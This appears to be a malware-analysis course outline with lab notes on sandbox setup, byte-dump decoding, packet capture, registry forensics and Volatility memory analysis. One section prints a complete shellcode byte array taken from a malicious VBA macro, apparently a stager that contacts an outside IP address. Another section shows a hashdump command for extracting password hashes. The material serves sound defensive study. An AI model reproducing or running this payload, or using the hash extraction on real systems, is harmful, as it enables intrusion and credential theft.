  • Topic 1: Introduction

  • Topic 2: Fundamentals of malware analysis

  • Topic 3: Malware classification

  • Topic 4: Examining AV signature

  • Topic 5: Customizing AV database

  • Topic 6: MA sandboxes

  • Topic 7: AV scanners

  • Topic 8: Review & progress test

  • Topic 9: Malware Lab Integrity

  • Topic 10: Recipe Manipulating HTTP/HTTPS

  • Topic 11: Cloning and imaging disks

  • Topic 12: Dynamic analysis tools

  • Topic 13: Malware forensics

  • Topic 14: Identifying packers

  • Topic 15: Registry forensics

  • Topic 16: Case studies

  • Topic 17: Malware debugging

  • Topic 18: JIT debugger for shellcode analysis

  • Topic 19: Memory forensics

  • Topic 20: Course Review

Labs

Config inetsim.conf

  • Replace the default line #service_bind_address 10.10.10.1 with: service_bind_address 0.0.0.0
  • Replace the default line #dns_default_ip 10.10.10.1 with: dns_default_ip 192.168.56.105
  • Note: restart the inetsim service after editing so that the new settings take effect

Decode the dump file into an executable file

#!/usr/bin/env python3
# Convert a dump of comma-separated decimal byte values (one value per byte)
# back into a raw binary file for further analysis.
with open("dump3") as dumpfile:
    data = dumpfile.read()
# int() tolerates surrounding whitespace; an empty trailing field is skipped
values = [int(v) for v in data.split(",") if v.strip()]
# every value must be 0..255, exactly as with the chr().encode('latin') approach
with open("final_file.bin", "wb") as finalfile:
    finalfile.write(bytes(values))

Converting the VBA array into a Python list

import struct

# The values copied from the VBA array are signed bytes (-128..127);
# struct 'b' packs each one back into a single raw byte.
myList = [-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, 13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 74, 29, 0, 0, 83, 80, 104, 87, -119, -97, -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, 104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, -1, -1, 47, 116, 97, 79, 56, 0, -21, 16, 49, -71, -117, 51, 127, -117, -33, 54, 31, -69, -19, 48, 21, -37, -56, -107, -59, 23, -88, -63, 0, -104, -116, -51, -104, 65, -48, -118, -80, 62, 123, -103, -51, -124, -11, -27, 50, 17, -77, -115, 98, 29, 106, -71, -108, 35, 99, -94, 70, 89, -41, 14, -9, 114, -126, -101, -95, -16, -75, 44, 28, 59, -70, 123, -27, 55, 63, -86, 8, 66, -3, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, 83, 73, 69, 32, 55, 
46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 48, 41, 13, 10, 0, 62, 73, 5, 8, -70, 26, -68, 95, 117, -58, -111, -107, 21, 47, -40, -43, 89, 118, 112, -18, 17, 116, -104, 95, 44, -45, -100, -125, 106, 75, -7, -57, 92, -90, -44, -128, -53, 22, -20, 101, 119, -65, -69, -87, 29, 90, 118, 66, 24, 20, -60, 86, -86, -69, 89, 56, 15, 74, 78, 113, 44, 73, -16, -52, -119, 13, 5, -24, -71, -64, 127, -79, -61, -126, -53, -105, -7, 76, -108, -60, -75, 41, -101, -61, -14, -10, 65, 120, -70, -117, -120, 55, -110, 51, 94, -73, -52, 82, -66, 10, -103, -105, -92, 32, -44, 8, -88, 126, 14, 75, -29, -72, -19, -87, 5, -61, 7, -109, -41, 23, -91, -116, 41, 24, -84, -47, 6, -99, 110, -117, 78, -47, 1, -112, -55, 29, 110, 32, 30, -83, 107, -101, 65, 111, -73, 113, -100, 64, -117, -103, -117, -30, 73, 102, 66, 76, -3, -51, 56, -66, -33, -73, -2, -5, -116, 17, 71, 75, 39, 61, 69, -44, 48, 5, -28, 108, -42, -58, -116, -5, 112, 42, -91, -69, 30, -90, 46, -20, -50, -18, -37, -54, -125, -27, 90, 30, 106, 62, -73, -88, 102, -113, 105, 116, 96, -101, 73, -9, -15, -8, 20, -125, -63, -7, 15, -124, 49, 6, -61, -87, 24, -84, 72, -113, 38, 32, 0, -30, 5, 124, 52, 18, -99, 46, 11, 56, -9, -14, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 52, 55, 46, 57, 51, 46, 54, 51, 46, 49, 55, 57, 0, 18, 52, 86, 120]

# Write the array out as raw bytes so the shellcode can be examined in a debugger or disassembler.
with open("shellcode.bin", "wb") as shell_code:
    for i in myList:
        shell_code.write(struct.pack('b', i))
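The two scripts above each handle one dump format by hand. The following is an added example (not code from the course) that generalizes them into a single decoder: it accepts either a bare comma-separated list or a VBA Array(...) literal, handles both signed and unsigned values, rejects anything that is not a byte, and labels the result for the lab notes. The sample array is constructed for the example.

```python
import hashlib
import re
from typing import Dict

# Constructed sample in the shape of a VBA macro's byte array; the values are
# made up for this example and are not a real payload.
SAMPLE_VBA = "buf = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100)"

def decode_byte_dump(text: str) -> bytes:
    """Rebuild raw bytes from a comma-separated list of decimal values.

    Accepts both conventions met in dumps: signed values (-128..127, as VBA
    and Java/C# byte arrays print them) and unsigned ones (0..255). If the
    text is a VBA Array(...) literal, the list is taken from inside the
    parentheses. Values outside both ranges raise instead of silently
    corrupting the output file.
    """
    m = re.search(r"Array\s*\((.*)\)", text, re.S)
    body = m.group(1) if m else text
    out = bytearray()
    for token in body.split(","):
        token = token.strip()
        if not token:
            continue          # tolerate a trailing comma or blank line
        v = int(token)
        if -128 <= v < 0:
            v += 256          # two's-complement signed byte -> unsigned
        if not 0 <= v <= 255:
            raise ValueError(f"{token} is not a byte value")
        out.append(v)
    return bytes(out)

def describe(blob: bytes) -> Dict[str, object]:
    """Size, SHA-256 and a coarse type guess, for labelling the sample."""
    kind = "PE executable" if blob[:2] == b"MZ" else "raw bytes (possible shellcode)"
    return {"size": len(blob), "sha256": hashlib.sha256(blob).hexdigest(), "kind": kind}

def dump_to_file(text: str, path: str) -> Dict[str, object]:
    """Decode text, write the bytes to path and return describe() of the result."""
    blob = decode_byte_dump(text)
    with open(path, "wb") as fh:
        fh.write(blob)
    return describe(blob)
```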

Install FOG server

  • https://docs.fogproject.org/en/latest/installation/server/install-fog-server/
  • Reset WebUI FOG password
    • If the root user in MySQL does not have a password (or it’s stored in ~/.my.cnf): sudo mysql -u root fog
    • If the root user in MySQL does have a password: sudo mysql -u root -p fog
    • Run this query to reset the password: UPDATE users SET uPass = MD5('password') WHERE uName = 'fog'; exit;

Capturing packets with Tshark via Python

Python 2.7.18 (default, Jul  1 2022, 10:30:50) 
[GCC 11.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from analysis import TShark
>>> cap = TShark("/tmp/mu.pcap")
>>> cap.start("enp0s3","10.0.2.15")
>>> Running as user "root" and group "root". This could be dangerous.
Capturing on 'enp0s3'
 ** (tshark:4588) 15:59:30.271227 [Main MESSAGE] -- Capture started.
 ** (tshark:4588) 15:59:30.271861 [Main MESSAGE] -- File: "/tmp/mu.pcap"
22 
>>> cap.stop()
>>> print cap.read()
>>> quit()

Output:

[REMOVED]
===================================================================
IP Addresses     value     rate          percent
-------------------------------------------------------------------
192.168.1.141      90       0.014359     100.00%
8.8.8.8            40       0.006382     44.44%
91.189.90.40       12       0.001915     13.33%
63.245.209.93      10       0.001595     11.11%
96.17.106.105      28       0.004467     31.11%
[REMOVED]
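The session above relies on the course's analysis module. As an added example (not the course's code), the block below builds the equivalent tshark capture and statistics commands and parses the per-IP table printed above into something a script can rank; it assumes that table is tshark's -z ip_hosts,tree summary, and the sample counts are constructed.

```python
import subprocess
from typing import Dict, List, Tuple

# Constructed excerpt of tshark's "-z ip_hosts,tree" summary, laid out like the
# output above; the counts are made up for this example.
SAMPLE_STATS = """\
===================================================================
IP Addresses     value     rate          percent
-------------------------------------------------------------------
192.168.1.141      90       0.014359     100.00%
8.8.8.8            40       0.006382     44.44%
91.189.90.40       12       0.001915     13.33%
===================================================================
"""

def capture_cmd(iface: str, host: str, pcap: str) -> List[str]:
    """tshark invocation that records only the sandbox host's traffic into a pcap."""
    return ["tshark", "-i", iface, "-f", f"host {host}", "-w", pcap]

def stats_cmd(pcap: str) -> List[str]:
    """tshark invocation that prints the per-IP endpoint tree for a saved pcap."""
    return ["tshark", "-q", "-r", pcap, "-z", "ip_hosts,tree"]

def parse_ip_hosts(text: str) -> Dict[str, Tuple[int, float, float]]:
    """Parse the ip_hosts table into {ip: (packets, rate, percent)}.

    Header, ruler and blank lines are skipped; the '%' sign is dropped.
    """
    hosts: Dict[str, Tuple[int, float, float]] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[1].isdigit():
            continue
        ip, value, rate, percent = parts
        hosts[ip] = (int(value), float(rate), float(percent.rstrip("%")))
    return hosts

def top_talkers(text: str, n: int = 3) -> List[str]:
    """IPs ordered by packet count, the first thing to check in a sandbox capture."""
    hosts = parse_ip_hosts(text)
    return sorted(hosts, key=lambda ip: hosts[ip][0], reverse=True)[:n]

def run_stats(pcap: str) -> Dict[str, Tuple[int, float, float]]:
    """Run tshark on a saved capture and parse the result (needs tshark installed)."""
    proc = subprocess.run(stats_cmd(pcap), capture_output=True, text=True, check=True)
    return parse_ip_hosts(proc.stdout)
```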

Discovering alternate data streams with TSK

  • Create an ADS: echo "this is a message" > host.txt:stream, or: notepad host.txt:stream
  • Read or modify the stream:
    • notepad host.txt:stream
    • more < host.txt:stream
    • dir /R
    • streams64 host.txt (the Sysinternals Streams utility)
  • PowerShell 3.0 and later include six cmdlets that can read and write ADS content directly

Registry Forensics with RegRipper plug-ins

  • Here’s a list of the registry hives present in almost all Windows systems:
    • HKEY_CURRENT_CONFIG: supported by the System, System.alt, System.log, and System.sav files
    • HKEY_CURRENT_USER: supported by the Ntuser.dat and Ntuser.dat.log files
    • HKEY_LOCAL_MACHINE\SAM: supported by the Sam, Sam.log, and Sam.sav files
    • HKEY_LOCAL_MACHINE\Security: supported by the Security, Security.log, and Security.sav files
    • HKEY_LOCAL_MACHINE\Software: supported by the Software, Software.log, and Software.sav files
    • HKEY_LOCAL_MACHINE\System: supported by the System, System.alt, System.log, and System.sav files
    • HKEY_USERS\.DEFAULT: supported by the Default, Default.log, and Default.sav files
  • In digital forensics, these registry hives can tell investigators:
    • HKEY_CURRENT_CONFIG: acts as a pointer or shortcut to a registry key containing information about the computer’s hardware profile
    • HKEY_CURRENT_USER: contains the computer settings the current user prefers (e.g., what software he/she typically uses)
    • HKEY_LOCAL_MACHINE\SAM: contains local user account and local group membership information, including passwords. It also tells you what privileges are granted (e.g., what files they can access) to each user and group in the Active Directory
    • HKEY_LOCAL_MACHINE\Security: contains local system security policy settings that control which domains are trusted to authenticate login attempts, which users are allowed to access the system, on what channels users are permitted to access the system, which privileges are assigned to a user, how users are audited, and login information for cached domain and service logins
    • HKEY_LOCAL_MACHINE\Software: contains most of the configuration information for the software installed on the computer and the OS
    • HKEY_LOCAL_MACHINE\System: contains the same information as HKEY_LOCAL_MACHINE\Software
    • HKEY_USERS\.DEFAULT: contains the registry settings used as the default for the currently logged-in user. If that user doesn’t have an existing profile, the C:\Users\Default\ntuser registry hive will get called
  • Windows Registry Forensics
    • Determining installed product information: perl rip.pl -r software -p product
    • Determining the product type: perl rip.pl -r system -p producttype
    • Determining the Windows version: perl rip.pl -r software -p winver
    • Determining the network cards used: perl rip.pl -r software -p networkcards
    • Determining the DHCP information: perl rip.pl -r system -p nic
    • Determining the wireless access points information: perl rip.pl -r software -p ssid
    • Determining the shutdown time: perl rip.pl -r system -p shutdown
    • Determining the time zone: perl rip.pl -r system -p timezone
    • Determining all installed applications: perl rip.pl -r software -p uninstall
    • Determining user SIDs: perl rip.pl -r software -p profilelist
    • Determining the recent documents used: perl rip.pl -r NTUSER.DAT -p recentdocs
    • Extracting information from the winlogon key: perl rip.pl -r software -p winlogon
    • Determining suspect’s web-browsing history: perl rip.pl -r NTUSER.DAT -p typedurls
    • Collecting information about unread emails: perl rip.pl -r NTUSER.DAT -p unreadmail
    • Determining applications set to auto start: perl rip.pl -r NTUSER.DAT -p user_run
    • Determining the value of the userinit registry key: perl rip.pl -r software -p userinit
    • Determining the user’s printers: perl rip.pl -r NTUSER.DAT -p printers
    • Collecting information about Cain & Abel: perl rip.pl -r NTUSER.DAT -p cain

Install volatility on CentOS 7

Memory dump & analysis tools

  • Image Information: volatility imageinfo -f memdump.mem
  • Running Processes: volatility pslist --profile=Win2008SP1x86 -f memdump.mem
  • Console Commands: volatility consoles --profile=Win2008SP1x86 -f memdump.mem
  • Services: volatility svcscan --profile=Win2008SP1x86 -f memdump.mem
  • Network Connections: volatility netscan --profile=Win2008SP1x86 -f memdump.mem
  • Registry Hives: volatility hivelist --profile=Win2008SP1x86 -f memdump.mem
    • Virtual addresses of the SAM and SYSTEM hives: 0x89c33450 and 0x86226008
  • Password Hashes: volatility hashdump --profile=Win2008SP1x86 -f memdump.mem -y 0x86226008 -s 0x89c33450 (Free Password Hash Cracker)
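The hashdump step above needs the two addresses from hivelist, and it is easy to swap them. As an added example (not part of the course material), the block below parses hivelist output, finds the SAM and SYSTEM hives, and builds the hashdump command with -y and -s in the right order, refusing to proceed if either hive is missing. The hivelist text is constructed in Volatility 2's column layout using the two addresses quoted above.

```python
import re
from typing import Dict, List

# Constructed hivelist output in Volatility 2's column layout. The SAM and SYSTEM
# addresses are the ones quoted above; the other lines are made up.
SAMPLE_HIVELIST = r"""Volatility Foundation Volatility Framework 2.6
Virtual    Physical   Name
---------- ---------- ----
0x8b21c008 0x02b3e008 \SystemRoot\System32\Config\SECURITY
0x86226008 0x0c2d3008 \REGISTRY\MACHINE\SYSTEM
0x89c33450 0x1a27e450 \SystemRoot\System32\Config\SAM
0x8b3a0008 0x03f51008 \Device\HarddiskVolume1\Users\bob\ntuser.dat
"""

HIVE_LINE = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(\S+)", re.I)

def find_hive_addresses(text: str) -> Dict[str, str]:
    """Map each hive's file name (SAM, SYSTEM, NTUSER.DAT, ...) to its virtual address."""
    hives: Dict[str, str] = {}
    for line in text.splitlines():
        m = HIVE_LINE.match(line.strip())
        if not m:
            continue                      # banner, header or ruler line
        virt, _phys, path = m.groups()
        name = path.rsplit("\\", 1)[-1].upper()
        hives.setdefault(name, virt)      # keep the first entry if a hive is listed twice
    return hives

def hashdump_cmd(hivelist_output: str, profile: str, memdump: str) -> List[str]:
    """Build the hashdump command: -y takes the SYSTEM hive (boot key), -s the SAM hive.

    Raises if either hive is absent rather than emitting a command that fails later.
    """
    hives = find_hive_addresses(hivelist_output)
    missing = [h for h in ("SYSTEM", "SAM") if h not in hives]
    if missing:
        raise ValueError("hivelist did not expose: " + ", ".join(missing))
    return ["volatility", "hashdump", f"--profile={profile}", "-f", memdump,
            "-y", hives["SYSTEM"], "-s", hives["SAM"]]
```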

Book

  • James Aquilina, Cameron Malin, Eoghan Casey. Malware Forensics: Investigating and Analyzing Malicious Code, Syngress Publishing © 2008.
  • Michael Hale Ligh, Steven Adair, Blake Hartstein, Matthew Richard. Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code, Wiley Publishing © 2011 (ISBN: 978-0470613030).
  • Michael Sikorski, Andrew Honig. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software, No Starch Press © 2012 (ISBN: 978-1-59327-290-6).

URLs

Course Implementation Plan (old version)

  • Session 1: Course Overview
  • Session 2: Overview of Malware and Malware Analysis
  • Session 3: Basic Dynamic Analysis
  • Session 4: Basic Static Technique
  • Session 5: Assembly Language Overview
  • Session 6: IDA Pro
  • Session 7: Analyzing Malicious Windows Programs
  • Session 8: Windows Internal and API
  • Session 9: Debugging
  • Session 10: Malware Analysis with OllyDbg and Windbg
  • Session 11: Kernel Debugging with Windbg
  • Session 12: Malware Behaviour and Mechanism
  • Session 13: Covert Malware Launching
  • Session 14: Malware stealth technique
  • Session 15: Mobile Malware